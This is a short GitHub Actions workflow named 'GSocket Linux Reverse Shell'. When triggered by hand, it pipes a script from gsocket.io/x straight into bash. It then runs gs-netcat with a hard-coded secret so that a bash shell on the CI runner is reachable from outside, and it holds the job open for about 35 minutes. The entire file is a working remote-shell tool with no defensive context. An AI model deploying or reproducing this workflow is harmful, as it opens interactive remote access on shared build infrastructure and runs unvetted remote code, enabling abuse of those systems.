name: GSocket Linux Reverse Shell

on:
  workflow_dispatch:  # 手動觸發執行

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Install gs-netcat from gsocket.io/x
        run: |
          curl -s https://gsocket.io/x | bash
          mv ~/.gsocket/bin/gs-netcat .

      - name: Start gsocket reverse shell (bash)
        run: |
          nohup ./gs-netcat -s jeikaizin1337 --exec /bin/bash > out.log 2>&1 &
          echo "GSocket shell started. You have 1 hour to connect..."
          sleep 2100
